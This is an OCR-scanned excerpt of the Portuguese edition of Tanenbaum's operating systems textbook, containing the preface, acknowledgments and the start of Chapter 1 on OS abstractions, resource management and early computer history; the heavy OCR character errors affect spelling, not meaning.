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Prefacio 


Esta i erce ara edięao de Sistemas operaaomis modernos e 
diferemc da edięao anterior cm urna serie de aspeaos. Para 
comcęar, os ca pil u los foram reorganizados para apresen- 
tar o materiał central no imrio c e dada ma tor enfase ao 
sisiema opcracional como triador de absiraęoes. Jtinlos, 
proccssos, cspaęos de cndereęamento viruiais c arquivos 
sao os prindpais conccitos fornccidospelos sistemas opera- 
cionais e, por isso, os capflulos que abordam Lais concekos 
foram colocados no imcio desta nova edięao, O Capimlo 1, 
que foi bastantc atualizado, nuroduz todos os conceilos. Ja 
o Capftulo 2 trata da abstraęao da CPU cm multiplos pro- 
cessos, enquanto o Capim lo 3 trata da abstraęao da memó- 
ria fisi ca cm espaęos de endereęamento (memória virtual) 
c o Capftulo 4 referc-se a abstraęao do disco cm arquivos. 

Como ritado, o Capftulo I foimodificado e atualizado cm 
muitos trechos: agora, por exempfo, e oferedda umaintrodu- 
ęao a linguagern dc programaęao C e ao modelo de tempo de 
execuęao dc C para leitores familiarizados apenas com Java. 

No Capftulo 2, a discussao sobre threads foi revisada 
e ampliada como refkxo do a u niemo da im porta ricia dc 
tai conceito. Entre outras coisas, o capftulo agora traz u ma 
seęao sobre o padrao pthreads da IEEE. 

O Capftulo 3, sobre gcrenciamemo de memória, foi rc- 
organizado e enfatiza a ideia dc quc urna das fimędes prin- 
cipais dc um sisiema opcracional c fornccer a abstraęao dc 
urn espaęo de endereęamento virtual para cada processo. 
O conteiido antenor sobre sislemas em fole foi elimina- 
do, e o materiał sobre a implementaęao de paginaęao foi 
atualizado para focar na neccssidade de lidar com espaęos 
de endereęamento maiores (muito comuns atualmente) e 
tambem na necessidade de velocidade. 

Nos capflulos 4 a 1, patie do materiał antigo foi extra- 
ida e novo conteiido foi inserido, As seęoes sobre pesąuisa 
atual que fazem parte desses capflulos foram compieta- 
mente reescritas e muitos problemas e excrcfcios de pro¬ 
gramaęao novos foram acrescentados, 

Atualizci Capftulo S induindo materiał sobre sistemas 
mułtinudcos c urna scęao completamcme nova sobre tee- 
nologia de virtualizaęao, hipcrvisorcs e maąuinas virtuais; 
alem disso, u samos o YMware como exemplo. 

O Capftulo 9 tambem passou por revisoes e reorgani- 
zaęoes, de forma que foram acrescentados novos conteii- 


dos sobre exploxaęao de códigos dc erro, softwares nocivos 
c defesas contra des. 

Nesia edięao, os capflulos 10 e 11 sao revisoes dos an- 
tigos capftulos de mesma mimeraęao. O antigo Capftulo 10 
tratava do UNIX e do Linux e H agora, o foco do Capftulo 10 
e evidentenieme o Unux, trazendo bastante materiał novo 
a sen respeito. Ja a revisao do antigo Capftulo 11 (sobre 
o Windows 2000) trata agora do Windows Vista, com um 
tratamento complctamenie atualizado do Windows. 

O Capftulo 12 e novo. Percebi que sistemas operacio- 
nais embarcados, como os en contra dos em telefon es ce¬ 
lu la res e PD As, sao negłigenćados na maioria dos Iivros- 
texto, apesar do fato de haver mais deles por at que PCs 
e notebooks. Esta edięao remedia o problema, com uma 
discussao ampliada accrca do Symbian OS, amplamente 
usado cm Smart Phoncs. 

Ja o Capftulo 13, sobre projetos de sistemas operacio- 
nais, sof ren poucas alteraędes em relaęao a segunda edięao. 

Recursos adicionais _ 

HHRJ Estc li vro oferecc tambem u ma serie de reeur- 

sos adicionais a professores e estudames H disponf- 
veis no site www,prenhal.coin/tanenbaum„br. 
wfebsite Professores tern a su a dispos ięa o a presentaęoes 
em PowerPoint e um manuał de soluęóes (emingles) com a 
resaluęao dos problemas apresentados nos capftulos.* 

Estudantes, porsua vez, encontram no sile laboratorio 
(em ingles), simtiladores (em ingles) e exercfcios de mtil- 
lipla escolha. 
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fizesse e eumprisse um cronograma muito apertado a firn 
dc quc esic Uvro ftcasse premio a tempo. E, duranlc iodo o 
tempo, ela permaneceu falante e alegre, apesar de todas as 
outras atribuięoes que Ihe toma vam tempo. Muito obriga- 
do, Trący. Sou muito grato por tudo. 

Ada Gavrilovska, da Georgia Tech, especialista em lin- 
guagein interna do Linux, atualizou o Capitulo 10, de um 
capitulo mais conccntrado no UMX para um mais focaliza- 
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quais a Microsoft acertou c errou. O livro esta muito me- 
ihor como resultado dc scu trabalho. 

Mikę Jipping, da Hope College, escreveu o capitulo so¬ 
bre o sistema operacional Symbian. A ausencia de materiał 
sobre sistemas embarcados de tempo real era nma grave 
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cada um em um capitulo, Shivakam Mishra, da Universida- 
de do Colorado, em Boulder, atuou como um sistema dis- 
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Capitulo 

Introduęao 


Urn slstema computarionai moderno consiste cm um 
ou mais processadores, memória prinapal, discos, impres- 
soras, tedado, mouse, monitor, i n ter la ces de rede c ou- 
tros disposit!vos dc entrada c safda. Enfim, ć um slstema 
complcxo. Sc cada programador dc aplicaęoes tivesse dc 
eiitender como tudo isso funciona cm detalhes, nenhum 
código chegaria a ser escrilo. Alem disso, gerendar todos 
esses componcntes c usa-los de maneira o timiza da e um 
trabalho extremamemc diKcil. Por isso, os computadorcs 
tern um dispositivo de software denominado slstema ope- 
racional, rujo trabalho e fornecer a os programas do usua¬ 
rio um modele de computador mci bor mais simples e mais 
limpo e lidar com o gerendamento de todos os recursos 
mencionados. Esses sistemas sao o Lema desie livro. 

A maioria dos leitores devc ter alguma experienda 
com um sisiema operacional como Windows, Linux, Free- 
BSD ou Mac OS X, mas as aparencias podem enganar. O 
programa com o qual os usuirios imeragem, normaImenie 
chama do de shell (ou imerpreiador de comandos} ąuando 
e bascado cm iexto e de GUT {graphkal mer interface — in- 
terlace grafica com o usuario) ąuando usa fcones, na rca- 
lidadc nao e parte do sisiema operacional embora o utilize 
para realizarseu trabalho. 

Um panorama simples dos prindpais componentes 
em discussao aqui e oferecido na Figura U, Na parte in¬ 
terior vemos o hardware. Ele consiste cm chips, płacas, 
discos, te da do, monitor e objetos fisicos semelhames. Na 
parte superior do hardware esta o software. A maioria dos 
computadores tern dois mveis de opcraęao: modo nu dcc e 
modo usuario. O slstema operacional e a peęa mais basica 
de software e opera em modo nucleo (lambern diamado 
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I Figura Ul On de o sisiema operacional se enca3xa. 


modo superyisor). Nesse modo de Lem acesso complcio a 
todo o hardware c pode exccutar qualqiicr instruęao quc a 
maąuina seja capaz de execuiar. O resto do software opera 
em modo usuario, no qual apenas um subeonjunto dc ins- 
truęoes da maąuina esta dispomvel Em panicular, aąuelas 
instruęoes quc afetam o comrole da maquina ou realizam 
E/S (Entrada/Safda) sao proibidas para programas de modo 
usuario. Relomarcmos a difcrenęa entre modo mideo c 
modo usuario repetidameme ao longo deste livro* 

O programa dc interface com o usuario, shell ou GUI, 
e o nfvd mais interior do software de modo usuario e per- 
mite que este inicic oulros programas, como o nayegador 
Web, leitor de e-mail ou reprodutor de mus i ca, Esses pro- 
gra mas tambem usam muito o slstema operacional. 

A arca de atuaęao do sisiema operacional e mostrada 
na Figura 1.1. Ele opera direlanieme no hardware e forne- 
ce a base para todos os outros sohwares. 

Uma distinęao importame entre o sistema operacional 
e o software tiormal (modo usuario) e que, se o usuario 
nao gostar de um determinado leiior de e-mail, ele sera 
livre para obter outro ou escreeer sen próprio leitor de e- 
-mail, se o quiser; mas nao The e permitido cscrcver sen 
próprio manipiilador dc interrupęao do relógio, que e pane 
do sisiema operacional e normalmentc esta prolegida pcio 
hardware contra Leniativas de alteraęóes pelo usuario. 

Essa distinęao, comudo, eas vezes confusa em sistemas 
cmbarcados (que podcm nao ter um modo nticleo) ou sis- 
temas interpretados (como sistemas operacionais baseados 
em Java, que usam interpretaęao, e nao hardware, para 
separar os componcntes). 

Ern muilos sistemas, ha programas executados cm 
modo usuario, mas que auxiliam o slstema operacional ou 
realizam funęócs pri vi legia da s. Por excmplo, muitas vezes 
existc um programa quc permite aos usuarios mudarem 
suas senhas. Essc programa nao faz parte do sisiema opera- 
cional e nao e executado em modo nucleo, mas realiza uma 
funęao claramenle dclicada e prccisa ser protegido de ma- 
neira especial Em alguns sistemas, essa ideia e levada ao 
extremo, e parte do que e tradidonalmeme tldo como sis- 
terna operacional (como ofiksystem — slstema de arquivos) 
e excattada em espaęo do usuario. Ncsses sistemas, e diffcil 
definir um li mite daro. Tudo o quc e cxccutado em modo 
nucleo sem duvida constilui parte do sisiema operacional, 
mas alguns programas executados fora dele Lambern sao 
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inquestionavdmeme parte dele, ou pelo menos estao imi- 
mamente associados a de. 

Os sistemas operacionais dilerem de program as dc 
usuario (islo Ł de aplicaędes) em outros aspectos aiem do 
lugar onde estao localizados, Em patticular, eles sao gran- 
des, complexos e tern vida longa. O codigo-fonte de um sis- 
tema operacional como o Linux ou o Windows tem cerca de 
cinco milhoes de linhas de código. Para se ter ideia do que 
isso significa, imagine iniprimir cinco milhoes de linhas em 
forma de livro, com 50 linhas por pagina e mil paginas por 
volumc (mnior que este livro). Seriam ncccssarios cem volu- 
mes para enumerar um sistema operacional desse poilc — 
basicamente u ma caixa dc livros inteira. Vocć conscguc se 
imaginar comcęando cm um emprego dc manutenęao dc 
um sistema operacional e, no primdro dia, ver seu clic- 
k trazendo u ma caixa de livros com o código e dizendo; 
"Aprenda-o"? E isso vale apenas para a parte que opera 
no niicleo. Programas de usuario como o GUI, bihliotecas e 
softwares de aplicaęao basica (como o Windows Explorer) 
podem atingir facilmente 10 ou 20 vezes esse valor. 

Agora deve estar claro por que os sistemas operacio¬ 
nais Lem vida longa — des sao muito diffceis dc escrcvcr 
e, unia vez tendo escrito um, o proprietario nao se dispoe 
a descarta-lo e comeęar de novo. Em vez disso, eles evo- 
luem por longos period os dc tempo, O Windows 95/98/Me 
era basicamente um sistema operacional e o Windows 
M7200G/XF/Vista ć um sistema diferente, Para os usuarios, 
eles parecem semdhantes porąue a Microsoft se assegurou 
de que a interface com o usuario do Windows 2000/XP 
fosse basta nie parecida com o sistema que estava substi- 
luindo, principalmenie o Windows 98. Entretanio, houve 
bons motivos para que a Microsoft dhmnasse o Windows 
98. Trataremos disso quando estudarmos o Windows em 
detalhes no Capitulo 11. 

O outro exemplo principal que usaremos ao longo des¬ 
ie livro (aiem do Windows) e o UMX e scus variantes e 
clones, Ele tambem evoluiu com o passar dos anos, com 
versóes como System V, Solaris e FreeBSD derivadas do sis¬ 
tema original, ao passo que o Linux e uma base de código 
nova, embora tenha como modelo muito próximo o UNIX 
e seja altamente compatwel com ele. Usaremos exemplos 
do UNIX ao longo deste livro e examinaremos o Linux em 
detalhes no Capitulo 10. 

Neste capitulo, mencionaremos rapidamente varios as¬ 
pectos import a mes dos sistemas operacionais, i udusi ve o 
que sao, sna historia, ostiposexistentes ł algunsdosconceitos 
basicos e sua estrutura. Retomaremos a muitos desses im- 
portantes tópicos em mais detalhes em cap fiu los post eriores. 



O que e um sistema 
operacional? 


E dificil definir o <jue e um sistema operacional aiem 
dc dizer quc ć o software quc cxccuta cm modo nucleo — 


e mesmo isso nem sempre e verdade. Parte do problema 
ocorre porque os sistemas operacionais realizam basica¬ 
mente duas Eunęoes nao relacionadas: fornecer aos pro- 
gramadores de aplicativos (e aos programas aplicativos P 
naturalmente) um conjunto dc reenrsos abstratos claros 
em vcz dc rccursos confusos dc hardware e gerenciar es¬ 
ses rccursos dc hardware. Dependendo do Lipo dc usua¬ 
rio, cle vai lidar mais com uma funęao ou com outra, Ve- 
jamos ca da uma delas, 

_ 1.1.11 O sistema operacional como uma 

maquina estendida 

A arąmtetura (conjunto dc instruęoes, organ izaęao 
dc memória, E/S c estrutura dc barramento) da maioria 
dos computadorcs cm mvd dc linguagcm dc maquina ć 
primitiva c dc dificil programami o, esperialmente a cn- 
trada/saida. Para tornar isso mais concreto, cxaminemos 
rapidamente como e feita a E/S da unidnde de discos fle- 
xfveis (disąuetes) a partir de um chip contro lado r compa- 
tfvel com o NEC-PD765. Esse chip e usado na maioria dos 
computadorcs pessoais bascados em processadores Intel 
Usamos discos flexfveis como exemplo porąue, embora 
sejam obsoletos, sao muito mais simples quc os discos 
rigidos modemos, O PD765 tem 16 comandos, cspccifi- 
cados pcla carga dc 1 a 9 bytes no registrador do disposi- 
tivo. Esses comandos sao para Idiura c escrita dc da dos, 
movimemaęao do brai;o do disco e forniataęao de tnlhas. 
Servem tambem para 1 ni ci a lizaęa o, sinalizaęao, rei nicią- 
lizaęao e recalibraęao do controlador e das unidades de 
disquetes. 

Os comandos mais basicos sao read e write; cada um ddes 
reąuer 13 parametros agrupados em 9 bytes. Esses paranie- 
iros espcdficam itens como o endereęo do bloco dc dados a 
ser lido, o mi mero de setores por trilha, o modo de gravaęao 
usado no meio ffsico, o espaęo livre entre setores e o que 
fazer com um marcador-de-endereęo-de-dados-rcmoYi- 
dos. Se cssas palavras nao fizeram sentido para voce, nao 
sc prcocupc: c assim mesmo, um tanio mfstico, Quando a 
operaęao c completada, o chip controlador retorna 23 eam- 
pos dc status e de erros agrupados em 7 bytes. Como se isso 
nao baslasse, o programodor da unidade dc discos flcxivcis 
ainda deve saber sc o motor esta ligado ou nao, Sc esti- 
ver desligado, de devera ser ligado (com um longo atraso 
de inidalizaęao) antes que os dados possani ser lidos ou 
escritos, O motor nao pode permanecer ligado por muito 
tempo, senao o disco flcxfvel podera sofrer desgaste. O pro- 
gramador e, entao, foręado a eąuilibrar dois fatores: longos 
atrasos dc inidalizaęao versus desgastes do disco flexfvel (e 
a perda dos dados nclc gravados). 

Sem entrar em detalhes de fata, e claro que um pro- 
gramador de mvd medio provavelmente nao se envolvera 
profundamente com os detalhes de programaęao das uni- 
dades de discos flexfveis (ou discos rigidos, que sao piores). 
Em vcz disso, o programador busca lidar com cssas uni- 







Sn#1N(366 


Cap (tul o 1 Sntroduęao 3 


dades de um modo mais abstrato e simples. No caso dos 
discos, uma abstraęao tipica seria aqueia compreendida por 
um disco que contem urna colcęao de arquivos com no- 
mes. Cada arquivo pode ser aberto para leitura ou escrita 
c, entao, ser lido ou escrito e r por firn, fechado. Detalhes 
como sc a gravaęao dcveria usar u ma modulaęao por fre- 
ąucncia modificada c qua] seria o cslado alual do motor 
nao apareceriam na abstraęao apresentada a o programador 
da aplieaęao, 

Abstraęao e o element o-cha ve para gerenciar com- 
plexidadc. Boas abstraęóes transformam uma tarefa qua- 
se impossivd cm duas mancjavcis. A primcira dclas e 
definir c implcmcmar as abstraęocs, A segunda c usar 
essas abstraęóes para rcsolver o problcma a ma o, Uma 
abstraęao que qua$e todo usuario de computaęao enten- 
de e o arquivo, Ele ć um fragmemo de mformaęao titil, 
como mną foto digital, uma mensagem de e-mail salva 
ou uma pagina da Web. Li dar com fotos, e-maiis e pa- 
ginas da Web e mais facil do qne manipular detalhes de 
discos, como o disco flexfve] descrito ameriormeme. A 
tarefa do sisiema operacional e criar boas abstraęóes e, 
em segulda, implememar e gerenciar os objetos absiratos 
criados. Ncstc livro, falarcmos muito dc abstraęocs. Elas 
sao um dos clementos crudais para comprecndcr os sis¬ 
temas operarionais. 

Esse ponio e tao importame que convem repeti- 
-lo ern outras palavras. Com i od o o respeito devido a os 
eiigenheiros industriais que projetaram o Macintosh, o 
hardware e fcio. Processadores reais, memórias, discos e 
outros dispositivos sao muito complicados e apresentam 
interfaces diffceis, desajdtadas, kliossincratkas e ineoeren- 
tes para quc as pcssoas que pr cci sarn escrever softwares 
as util i zenu Algumas vczes isso se deve a necessidadc 
dc compatibilidadc com a vcrsao anterior do hardware, 
algo mas vezes ao des ej o de economizar dinhelro, 
mas algumas vezes os projeiisias de hardware nao per¬ 
ce bem o$ probiemns que esiao causando ao software (ou 
nao se importam com lais problemas), Pelo contra rio, 
unia das prmdpais tarefas do sisiema operacional e ocul- 
tar o hardware e oferecer aos programas (e sens progra- 
madores) abstraęocs precisas, daras, eleganies e coerenies 
com as quais trabalhar. Os sistemas operarionais irans- 
formam o feio em bonito, como mostrado na Figura L.2. 

Dcve-se obscrvar que os clientcs reais do sisiema opc- 
racional sao os programas aplicativos (via programadores 
de aplicalivos, natura Imente). Sao des que lidam di rei a- 
nieme com o sLstema operacional e suas abstraęóes. Por 
outro lado, os usuarios Ihiais lidam com abstraęóes forne- 
cidas pela imerface do usuario, seja a lin ha de comandos 
shell ou uma interface grafica. Embora as abstraęóes da 
imerface com o usuario possani ser semelhames as for- 
nceidas pelo sisiema operacional, nem sempre e o caso. 
Para csdarecer esse porno, considerc a arca de trabalho 
normaI do Windows c o prompt de comando, orientado 
a linhas dc comando. Ambos sao programas exccutados 


<— Interface 
bonita 


Interface 

feia 


I Figu ra 1.2 S istem as operacionai s t ransformam ha rdware feio 
em abstraęóes bonitas. 

no sisiema operacional e u sam as abstraęóes que o Win¬ 
dows fornece, mas oferecem interfaces de usuario muito 
diferentes. De modo semelhante, um usuario Linux exe- 
culando Gnomę ou KDE ve uma interface muito diferen- 
tc daąuda vista por um usuario trabalhando diretamemc 
sobrc o X-Window System (orientado a tcxto) subjacente, 
mas as abstraęocs do sisiema operacional subjacente sao 
as mesmas em ambos os casos. 

Neste livro, estudaremos as abstraęóes forneddas pe- 
los programas aplicativos em mais detalhes, mas falarcmos 
muito menos sobie interfaces com o usuario. Esse cum 
tema amplo e importante, mas apenas pcrifcricamente re- 
larionado com sistemas opcracionais. 

1-1^2 I O sisiema operacional como um 
gerenciador de recursos 

O conceito de um sisiema operacional como provedor 
de uma interface conveniente a sens usuarios e uma vi- 
sao top-down (abstraęao do todo para as partes), Em uma 
visao aStcrnativa, bottom-up (abstraęao das partes para o 
Codo), o sisiema operacional gc ren ci a todas as partes de um 
sistema cornplexo. Computadores modemos sao constituf- 
dos de processadores, memórias, temporizadores, discos, 
dispositivos apontadores lipo mouse, interfaces de rede, 
impressoras e uma ampla variedade de outros dispositivos. 
S eg u ndo essa visao, o trabalho do sisiema operacional e 
forne cer uma alocaęao ordenada e controlada de processa¬ 
dores, memórias e dispositivos tle E/S enire varios progra¬ 
mas que competem por eles. 

Sistemas operarionais modemos permitem quc miilti- 
plos programas sejam exeaitados ao rnesmo tempo. Ima- 
gine o que aconteceria se tres programas em execuęao em 
algmn computador ten Lassem imprimir suas safdas si mul¬ 
ta nea nieme na mesma inipressora. As primeiras linhas 
poderiam ser do programa i, as linhas segirimes seriam 
do programa 2, algumas outras do programa 3, e assim 
por diante. Resultado: uma confusao. O sisiema opera ci o- 
nal pode irazer ordem a essa confusao potencial, arina- 
zenando temporariamente no disco todas as safdas desti- 
nadas a inipressora. Quando um programa e finaUzado, 
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o sistema operacional poderia entao enviar sua safda, que 
estaria no arquivo em disco, para a impressora. Ao mes- 
mo tempo, o outro programa poderia continuar gerando 
mais safdas, que nao estariam, olmamenie, indo para a 
impressora (ainda). 

Qnando um computador (ou uma rede) tern multiplos 
usuarios, a necessidade de gerenciar e proteger a memória, 
dispo$itivos de E/S e outros recursos e muito maior, ja que, 
de outra maneira, os usuarios poderiam iruetferir uns nos 
outros, Alem disso, os usuarios muitas vezes prcdsam com- 
partilharnao somentc hardware, mas lambem informaęao 
(arquivos, baneos de dados etc,}. Em resumo, essa visao 
do sislema operacional mostra quc sua larefa principal e 
manier o conlroie sobre queni esta u san do qual recurso, 
gara nl ind o suas requisięoes de recursos, controlando as 
contas e mediando conflitos de requisięóes emre diferentes 
programas e usuarios. 

O gerenriamento de recursos realiza o comparti- 
lhamento (ou multiplexaęao) desses recursos de dtias 
inaneiras diferentes: no tempo e no espaęo. Quando um 
recurso e comparrilhado (multiplexado) no tempo, dife¬ 
rentes programas ou usuarios aguardam sua vez de usa- 
do, Primeiro, um dcles obiem o uso do recurso, dai um 
outro, e assim por diante, Por exemplo, com somente 
u ma CPU c multiplos programas prccisando ser cxccuia- 
dos uda, o sistema operacional aloca a CPU a um progra- 
ma, e após esle ser exeetitado por tempo su fi cienie, outro 
programa obtcin seu uso, entao outro e, por firn, o pri- 
meiro programa novameiite. Deierminar como o recurso 
e compartilliado no tempo — quem vai depois de quem e 
por quanto tempo — e tarefa do sistema operacional. Ou¬ 
tro exemplo de compartilhamento no tempo se da com a 
impressora. Quando multiplas safdas sao enfileiradas para 
rmprimir cm urna unica impressora, deve-se decidir sobre 
qual sera a próxima safda a ser impressa. 

O outro lipo de compartilhamento (multiplexaęao) 
e o de espaęo. Hm lugar de consumidores esperando sua 
vcz, cada um ocupa urna parte do recurso. Por cxemplo, 
a memória principal e normalnienie dividida entre varios 
programas em execuęao. Assim, cada um pode residir ao 
mesmo tempo na memória (por exemplo, a firn de ocupar 
a CPU l em pora ria menie), Exisiindo memória su li ci en te 
para abrigar multiplos programas, e mais efidente nianie - 
-los nela em vez de destinar loda a memória a um só dcles, 
esperialmente se o programa prccisar apenas de urna pe- 
quena fraęao do Lotal. NaturahnenLc, isso levaiiLa questoes 
sobre jusiięa, proteęao etc., e cabe ao sistema operacional 
reso!ve-las, Outro recurso que e compartilhado no espa¬ 
ęo 6 o disco (rfgido), Em varios sistemas, um iinico disco 
pode conter arquivos de rauitos usuarios ao mesmo tempo. 
Alocar espaęo em disco e mant er o controle sobie quem 
esta nsando quais parcelas do disco e uma tfpica tarefa de 
gerenriamento dc recursos do sistema operacional, 


1.2 


Historia dos sistemas 
operacionais 


Os sistemas operacionais vcm passando por um pro- 
cesso gradual de evoluęao. Nas próxiinas seęoes veremos 
algumas das prlncipals fases dessa evo!uęao. Como a his¬ 
toria dos sisiemas operacionais e bastante ligada a arqui- 
letura de computadores sobre a qual des sao executados, 
veremos as sucessivas geraęoes dc computadores para en- 
tendermos as primeiras vcrsocs dc sistemas operacionais. 
Essc mapeamento das geraęoes de sistemas operacionais cm 
rclaęao a geraęoes dc computadores e um tanio vago, mas 
revela a existencia de uma certa estru tura, 

A sequencia de evemos apresentada a segiiir e em 
grandę medida cronológica, mas fol um percurso ackienta- 
do. Os desenvolvimentos nao esperaram que os anteriores 
terminassem antes de se iniriarem. Houve muitas sobrepo- 
sięoes, para nao falar de muitos falsos comeęos e becos sem 
safda. Considcre-a como um guia, nao como a palavra finał, 
O primeiro comptiiador digitai foi projetado pelo ma¬ 
lenia lico ingles Charles Babbage (1792-1871). Embora 
Babbage tenha empregado a maior parte de sua vida e 
de sua fortuna para construir sua 'maąuina analftica', ele 
nunca conseguiu ve-la funcionando de modo apropriado, 
pois era inteiramentc mccanica e a te etiologia dc sua epoca 
nao poderia produzir as rodas, as engrenagens c as correias 
de alta precisao quc eram neeessarias, Ś óbvio que a ma- 
quina analftica nao possufa um sistema operacional. 

Outro aspeao histórko interessante foi que Babbage 
percebcu que seria preciso um software para sua maquina 
analftica. Para isso, cle contratou uma jovcm chamada Ada 
Lovelace, filha do famoso poeta ingles Lord Byron, como 
a primcira programadora do mundo. A linguagem dc pro- 
gramaęao Ada® foi assim denominada cm sua homenagem. 


1-2.11 A primeira geracao (1945-1955) - 
valvulas 

Depois dos infrutfferos esforęos de Babbage, seguiram- 
-se poucos progressos na construęao de computadores di- 
gliais ate a Segunda Guerra Mundial, que esUmulou uma 
explosao de atividades. O professor John Ataoasoff e seu 
entaoaluno degraduaęao Clifford Berry construfram o que 
consideramos o primeiro computador digitai em ftinciona- 
mento, na Universidade do Esiado dc Iowa. Ele usava 300 
valvulas. Quasc ao mesmo tempo, Konrad Zuse, em Bertim, 
conslruiu o computador Z3 de rcles. Em 1944, o Colossus foi 
dcsenvolvido por um grupo em Bletchley Park, Inglaterra, 
o Mark foi conslrufdo por Howard Aiken cm Harvard e o 
ENIAC foi conslrufdo por William Mauchlcy c seu aluno de 
graduaęao J, Prosper Eckert na Universidade da Pensilva- 
nia. Alguos eram binarios, alguns usavam valvulas, alguns 
eram programavcis, mas todos eram muito primiiivos e le- 
vavam segundos para exectiiar atć o calcu!o mais stmples. 
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Naąuda epoca, urn mesmo grupo de pessoas projeta- 
va, construfa, programa va, operava e realizava a manuten- 
ęao de ca da maąuina. Toda a programaęao era feita cm có- 
digo de maąuina absoluto e muitas vczcs conectando plugs 
cm paineis para comrolar as funęoes basicas da maąuina. 
Nao havia linguagens de programaęao (nem mesmo a lin- 
guagem assembly exislia). Os sistemas opcradonais tam- 
bem ainda nao haviam sido inventados. O modo norma] 
de operaęao era o seguinte: o programador reservava ante- 
cipadamente tempo de maąuina em u ma planilha, la para 
a sata da maąuina, inscria seu painel de programaęao no 
compulador e passa va algumas horas lorce udo para ąue 
nen bu ma das 20 mil valvulas ąueimasse durame a execu- 
ęao* Fraticamenie lodos os probleinas eram calcu los nume- 
ricos diretos, como determinar tabelas de senos, cossenos 
e logariimos. 

No infcio da decada de 1950, cssa rotina havia sido 
aprlmorada com a imroduęlo das perfuradoras de cartoes. 
Era po$stvel, emao, cscrcvcr pro gra mas cm cartoes e le-los 
em lugar de paineis de programaęao; de outra maneira, o 
procedimento seria o mesmo. 

1-2-2 I A segunda geraęao (1955-1965) - 

transistores e sistemas em lote (batch) 

A imroduęao do iransistor em meados da decada de 
1950 inudou o ąuadro radicalmeiitc. Os computadores tor- 
naram-se su fi den ternem e confiaveis para que pudessem 
ser fabricados c comerdalizados tom a expectativa de ąue 
continuariam a funcionar por tempo suficieme para execu- 
tar cilguiii trabalho utih Fela primeira vez, havia urna dara 
separaęao emre projetistas, fabricantes, programadores e 
tecnicos da inanutenęao. 

Essas maąuinas — entao dcnominadas computado- 
res de grandę porte {mmnframes) — ficavam isoladas em 
salas especiais com ar-condidonado, opcradas por eąuipes 
profissionais. Somente grandes corporaędes, agencias go- 
yernamemais on universidades podłam pagar varios mi- 
lhoes dc dólares para te-las* Para unia tarefa (isto e, um 
programa ou um conjunto de programas) ser executada r o 


programador primeiro escrevia o programa no papel (em 
Fortran ou em iinguagem assembly) e depois o perfurava 
em cartdes. Ele entao levava o maęo de cartoes para a sala 
de entradas, entregava-o a um dos operadores e ia tomar 
um cafe ate que a saida imprcssa estivesse pronta. 

Ao Hm da execuęao de urna tarefa pelo computador, 
um operador ia ate a impressora, retirava su a saida e a le- 
vava para a sala de safdas, de modo que o programador 
pudesse retirada mais tarde. Ele entao apanhava um dos 
maęos de cartoes que foram irazidos para a sala de entradas 
e o colocava na leitora de cartoes. Se fosse necessario um 
eompilador Fortran, o operador precisava retirar do arma- 
rio o maęo de cartoes correspondcnte e le-ło. Minto tempo 
de compulador era desperdięado enąuamo os operadores 
andavam pela sala das maąuinas. 

Por causa do alto custo do eąuipamemo, era natural 
que se comeęasse a bu seat ma n ci ras dc reduzir o des per- 
dfcio dc tempo no uso da maąuina, A soluęao ge rai men te 
adotada era a do sistema em lote [batch), A idcia era gra- 
var varias larefas em lita magnetica usando um compula¬ 
dor rdativamente mais ba rato, como o IBM 1401, ąue era 
nmito boin para ler cartoes, copiar fiias e imprimir saidas, 
mas nao tao eficiente em calcu los mmiericos, 

Outras maąuinas mais caras, como a IBM 7094, eram 
usadas para a computaęao proprianieme dita. Essa situaęao 
e most rada na Figura 1.3. 

Depois de aproxiinadamerue uma hora acumulan- 
do um lote de larefas, os cartoes eram lidos em uma fua 
magnetica, ąue era cncaminhada para a sala das maąui¬ 
nas, omie era momada em urna unidade de fi ta. O opera¬ 
dor, entao, carregava um programa especial (o antecessor 
do sistema operacional de boje), que lia a primeira tarefa da 
fita e exeaitava-a, A saida nao era impressa, mas grava- 
da em uma segunda fita. Depois de cada tarefa terminada, 
o sistema operacional automalicamente lia a próxima tare- 
fa da Hta e comeęava a execma-la. Quando todo o lote era 
processado, o operador retirava as fiias de entrada e de sai¬ 
da, trocava a fita de entrada com a do próximo lote e levava 
a fita de saida para um compulador 1401 imprimida off- 
-Ime, isto e, nao conectada ao computador prinapal. 




Figura 1 .3 Unn sistema em lote [batch) antigo. (a) Os programadores levavam os cartoes para o 1401. (b) O 1401 gravava o lote de 
tarefas em fita. fc) O operador levava a fita de entrada para o 7094, (d) O 7094 executava o processamento. <e> O operador fevava a 
fta de saida para o 1401. (f) O 1401 imprimia as saidas. 
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A estru tura dc uma tarefa tipica e mostrada na Figura 
1.4. Ela comeęava com uni cartao $JQB, que especificava o 
tempo maximo dc processamcnto em minut os, o numero 
da conta a ser debitada e o numero do programador. Em 
seguida vinha um cartao SFORTRAN, que mandava o sis- 
tema opcracional carregar o compiIndor Fortran a partir da 
fita dc sistema* Depois vinham os cartoes do programa a ser 
compilado c, entao, um cartao $LOAD, que ordęnava ao 
sistema opcracional o carregamento do próg ram a-objęto 
recem-eompilado. (Os programas eompilados muitas vezes 
eram gravados em fitas-rascunho e linham de ser carrega- 
dos expliritamenie.} Era entao a vez do cartao $RUN, que 
dizia para o sistema opcracional executar o programa com 
o conjunto de dados co usta me nos cartoes seguintes. Por 
firn, o cartao $END marcava a condusao da tarefa. Esscs 
cartoes dc controJc foram os prccursorcs das linguagens dc 
controle dc tarefas c dos interpretadores dc comando atuais. 

Os grandes computadores de segunda geraęao foram 
usados, em sua niaioria, para calculos rientifkos, como 
eąuaędes diferenciais parriais, muito frequenies na ffsica 
e na engenharia. Eles cram preponderantemente progra- 
mados em Fortran c em linguagem asscmbly. Os sistemas 
operacionais tipi cos cram o FMS (Fortran Monitor System) 
e o IB SYS, o sistema opcracional da IBM para o 7094, 

1-2.51 A terceira geracao (1965-1980) - 
Cis e multiprogramatao 

No inido na de ca da dc 1960, a maioria dos fabricantcs 
de computador ofereda duas linlias de produtos disiimas c 
lotalmente incompatwds, Dc um lado havia os computa¬ 
dores cieni] fi cos dc grandę escala e one ma dos a paiavras, 
como o 7094, u sad os para calculos numericos na dcocia 
c na engenharia. Dc outro, existiam os computadores co- 
merdais orientadosa caractcrcs, como o 1401, amplamen- 
tc usados por bancós c companhias de seguros para ordę- 
naęao e impressao cm fiias. 

Descnvolver e manier duas linlias de produtos com- 
plctameme diferentes demandava grandę custo para os 
fabricantcs. Alęrn disso, muitos dos clientes prcdsavam 



I Fi g u ra 1.4 Estmtura de um a tarefa tipi ca FM S. 


inicialmenie dc uma pequena maquina, mas depois ex- 
pandiam sens negócios e, com isso, passavam a demandar 
maquinas maiores que pudessem executar todos os sens 
programas antigos, porem mais rapidamente. 

